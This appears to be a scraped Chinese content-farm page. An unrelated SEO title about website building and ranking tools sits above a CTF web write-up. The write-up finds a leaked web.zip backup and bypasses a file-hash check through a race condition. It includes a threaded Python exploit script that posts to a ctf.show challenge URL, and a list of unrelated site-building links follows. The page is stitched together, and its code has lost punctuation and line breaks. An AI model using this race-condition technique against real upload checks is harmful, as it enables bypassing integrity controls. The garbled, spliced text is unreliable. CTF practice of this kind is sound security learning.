当前位置: 首页 > news >正文

自贡北京网站建设专业排名优化工具

自贡北京网站建设,专业排名优化工具,佛山小程序开发平台,乌海市建设工程网站0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 首先跑一下字典#xff0c;这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份#xff0c;备份的是check.php.bak 然后接着看#xff0c;可以看到这里不太可能是sql注入#xff0c;有…0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 首先跑一下字典这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份备份的是check.php.bak 然后接着看可以看到这里不太可能是sql注入有一个请求 check.php?tokentokenphp://input 正好接着上一个文件备份的内容看一下源码 首先token是将date(i)进行md5然后就是文件md5对比要求md5一致但是sha512不一样这里比较的文件是key.dat 直接访问进行下载即可。 原理就是将上传的文件保存为flag.dat,然后进行对比那么这种情况肯定会出现条件竞争也就是说flag.dat在比较完第一次之后被覆盖了的话就可以满足第二个条件 import requests import time import hashlib import threadingistr(time.localtime().tm_min) mhashlib.md5(i.encode()).hexdigest()def go_to(data):try:urlfhttp://1babff5a-576a-48b8-9f50-d4feeb5b7cbd.challenge.ctf.show/check.php?token{m}php://inputsrequests.post(url,datadata)print(s.text)except Exception as e:passwith open(key.dat,rb) as t:data1t.read()pass for i in range(20):threading.Thread(targetgo_to,args(data1,)).start() for i in range(20):data2abbcdthreading.Thread(targetgo_to,args(data2,)).start()以上
http://www.sadfv.cn/news/463529/

相关文章:

  • aws wordpress 站群如何做网站地图txt
  • 集团公司网站建设江苏10大网站建设公司
  • 网页设计网站模板网站建设网页模板下载网站建设与管理小论文
  • 上海企业网站制作哪家专业企业网站的建设的目标人物是
  • 陕西企业网站建设哪家专业开了外网网站打不开
  • 网站建设与维护实训报告怎么在百度上推广自己的产品
  • 国内最大的摄影网站wap网站不流行
  • 亿级别网站开发注意怎么简单页网站
  • 手机版网站与app企业电子商务网站优化方案
  • 滨江网站建设公司平面设计软件图标
  • 免费的舆情网站入口有哪些汉川做网站
  • 学院评估 网站建设整改如何建立自己的云服务器
  • 做游戏网站需求确认wordpress页面如何设置新窗口打开
  • 广西柳州网站建设公司男女做受网站
  • 贵阳招聘网站建设电子商务网站推广计划书
  • 企业网站seo平台国家企业信用公示网官网
  • 南召微网站建设怎么创建网站app
  • 2017辽宁建设厅查询网站北京正邦设计公司官网
  • 营销技巧心得体会seo优化的优点
  • 做网站大概要多久国外家谱网站的建设
  • 邯郸做移动网站的公司网站建设轮播图
  • 室内设计公司免费网站高端网站建站
  • 重庆h5建站备案期间的网站打开
  • 北京市中关村有哪家可以做网站维护公司建设门户网站的总结
  • 建设一个网站需要哪些人员参与中山东莞网站推广
  • 杨浦区建设小学网站杭州英文网站建设
  • psd转 wordpress成都官网seo厂家
  • 后台网站如何建设北流建设局网站
  • 人事怎么做招聘网站比对分析中国万维网官网域名注册网站
  • cname解析对网站影响网站建设技术手段